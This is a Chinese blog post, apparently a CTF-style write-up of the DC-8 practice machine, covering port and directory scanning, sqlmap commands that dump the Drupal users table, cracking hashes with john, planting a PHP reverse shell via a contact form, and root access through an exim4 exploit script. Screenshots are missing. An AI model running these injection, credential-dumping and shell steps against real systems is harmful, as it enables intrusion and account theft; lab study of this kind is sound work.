DC-8靶机复现

一、信息收集

1.使用nmap对目标靶机进行扫描:

image

发现开放了22和80端口先访问一下80端口:

image

查看一下网站。

2.目录扫描

image

扫出来很多,发现有robots.txt文件:

image

查看一下:

image

发现有登录界面地址,访问一下:

image

二、漏洞攻击

1.sql注入

发现左列表的连接数这样的 http://192.168.1.136/?nid=1

image

http://192.168.1.136/?nid=2

image

可以试试sql注入:

sqlmap -u "http://192.168.1.136/?nid=1" --batch

image

发现可以注入,查看下数据库:

sqlmap -u "http://192.168.1.136/?nid=1" -dbs --batch

image

爆出d7db数据库的表:

sqlmap -u "http://192.168.1.136/?nid=1" -D d7db --tables --batch

image

发现users表,爆出usesr表的列:

sqlmap -u "http://192.168.1.136/?nid=1" -D d7db -T users --columns --batch

image

发现name和pass,查看字段:

sqlmap -u "http://192.168.1.136/?nid=1" -D d7db -T users -C name,pass --dump --batch

image

发现两个用户,将两个pass字段放入john中进行破解:

john --wordlist=/usr/share/wordlists/rockyou.txt /root/桌面/pass

image
(扫出来后忘记截图了,john只扫一次,会把结果保存下来)

爆出密码turtle,这样就有了密码,登录到系统:

2.写入反弹shell

image

john登陆成功,简单查看一下系统发现可以添加新页面:

image

但是发现john的权限不足,无法写入php文件:

image

再次寻找发现,Contact Us中有写php文件的地方:

image

然后写入反弹shell:

image

在view界面填写数据进行提交,并监听1234端口:

image

连接成功,升级一下 shell

三、提权

1.查询可利用漏洞

image

查看是否有特殊执行的文件:

image

查看exim4的版本:

image

查找exim4的漏洞:

image

查看46996.sh文件:

image

2.利用提权漏洞

发现提权方法,将此文件复制到/var/www/html/目录下,开启HTTPServer服务:

image

在反弹shell中下载脚本:切换到tmp目录下下载成功:

image

对46996.sh文件进行赋权:

image

文件结束符有错误,将其替换并进行提权:

sed -i -e 's/\r$//' 46996.sh

image

image

3.提权到root

提权到root,查看flag:

image

完成。

posted @ 2021-11-26 14:42  sainet  阅读(106)  评论(0编辑  收藏  举报